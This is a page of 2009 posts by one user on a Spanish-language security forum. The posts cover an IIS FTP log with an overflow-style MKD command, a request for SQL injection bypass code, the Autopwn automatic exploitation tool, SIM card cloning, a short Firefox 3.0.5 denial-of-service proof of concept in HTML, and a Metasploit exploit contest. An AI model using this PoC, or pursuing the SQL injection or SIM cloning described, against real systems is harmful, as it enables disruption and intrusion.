c:\winnt\system32\logfiles\MSFTPSVC1

Los logs se mostrarian asi:

Código:
Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 1111-01-01 22:45:13
#Fields: time c-ip cs-method cs-uri-stem sc-status
22:45:13 169.254.117.152 [1]USER anonymous 331
22:45:13 169.254.117.152 [1]PASS password 230
22:45:13 169.254.117.152 [1]MKD JUNK@C~~~~~~~~~~~~~~~~~~~~


Have fun!

-berz3k.

5  Programacin / Programacin Visual Basic / Peticiones Web SQL Injection en VBasic en: 10 Junio 2009, 10:15
Pues eso colegas.

No soy tan fan de la programacion de VBasic pero el curro ahora me lo pide, apenas me hice un form basico para peticiones GET/POST pero ahora necesito alguna funcion, tips o source codes que conozcais uds,  para hacer peticiones SQL injection basicas, hablo de algun bypas authentication, un union+select basic etc, ideas , links , codigos are welcome...

-berz3k.

6  Seguridad Informtica / Bugs y Exploits / Analisis y Explotacion con Autopwn v1.8 en: 13 Abril 2009, 12:10
Que es Autopwn v.1.8

Es una herramienta auto-ejecutable "autohack" con una interaccion minima para explotacion remota/local basada en vulnerabilidades de sistemas win32.

Caracteristicas:

- Contiene explotis compilados (binarios / ejecutables ) de los bugs/vulnerabilidades mas conocidas
- No hay necesidad de depurar o compilar cdigo fuente.
- Escanea todos los puertos 1 al 65535 (tcp) despues de reconocer la IP, intentara todas las posibles vulnerabilidades de acuerdo a la lista de puertos abiertos (Openports.TXT)
- No requiere ninguna base de datos en el back-end.
- Puede ser usado para probar la eficiencia de algun IDS / IPS
- La ejecucion de exploits son de forma independiente y no se basa en el "Fingerprinting".

Descarga:

:http://solidmecca.co.nr
:http://winautopwn.co.nr
:http://winautopwn.exofire.net


Trasteado con Win2k usando Autopwn 1.8

Configuracion inicial:
 


Scanneo de puertos de forma automatica (no desesperar y esperar algunos minutos)1-62514



Ejecutando exploits:




-berz3k.

Mala experiencia con Autopwn 1.8? algun otro ejemplo , tal vez remote/local con otro exploit? 



7  Seguridad Informtica / Nivel Web / Tuneando Firefox para Hacking Etico en: 13 Abril 2009, 10:43

Me parece faltan algunas tools, pero el paper agrega unas cuantas tools para tener tu FireFox al punto (audit webapp, hacking webapp)
:http://www.security-database.com/toolswatch/IMG/pdf/Turning_Firefox_Ethical_Hacking_Platform.pdf

-berz3k.
8  Comunicaciones / Hacking Mobile / Clonacion de SIM cards en: 29 Enero 2009, 18:26

Pues es eso, me ha surgido la duda y ademas cuento con el capital para hacerlo actualmente, me gustaria saber si es posible hacer lo ya tan hablado "Clonacion de SIM cards". de momento estoy en la etapa de investigacion:

1) Lectores de SIM card , cuales conoseis? cuales son los mejores? que hardware es el necesario? software?

2) Clonadores de SIM card, cuales conoseis? cuales son los mejores que hardware es el necesario? software?

3) Alguna vez lei tools y hardware forenses para SIMcards y ademasd tools para investigar dicho telefono, conoseis mas datos sobre ello? links, soft etc?


-berz3k.

 
9  Seguridad Informtica / Bugs y Exploits / Nuevo DoS sobre Firefox 3.0.5 + PoC en: 14 Enero 2009, 06:45
Exploit:

FireFox 3.0.5 // Windows Vista

Código:
<BODY onload="
document.designMode='on';//string
document.removeChild(document.firstChild);//object
document.queryCommandState('BackColor');
">

Testing Version

Código:
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5




Bug & Source reportado en:
https://bugzilla.mozilla.org/show_bug.cgi?id=456727

Source:

-berz3k.


10  Seguridad Informtica / Bugs y Exploits / Concurso Desarrollo de Exploits para MSF en: 6 Enero 2009, 22:18
Pues el pasado 4 de Enero se abrio la convocatoria para desarrolar exploits para el Framework de Metasploits, tengo algunos codes que no he portado y algunos otros que los tengo abandonados, seguramente muchos de aqui, estamos en las mismas, os animo a participar, desarrollar y aportar algunos codes, abro este HILO para dicho proposito y/o en conjunto.

+Inicia ahora mismo, hasta el 1 de Febrero 2009

+El ganador segun dicen:
150 Euros por paypal el 10 de Febrero:

+Los puntos se evaluan:

Modulo DoS funcionando 1 punto
Modulo WebApp funcionando 2 puntos
Modulo Exploit (local/remote) 3 puntos
Exploit no publico 0day un plus de 2 puntos

+ Los modulos/exploits que sean aceptados seran publicados en la pagina:
https://www.securinfos.info/metasploit/msfxdc.php

con sus respectivo nombre,nick y creditos.

Por lo que veo apenas se han publicado 2 modulos.


-berz3k.

Source:
https://www.securinfos.info/metasploit/msfxdc.php

Páginas: [1] 2 3
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines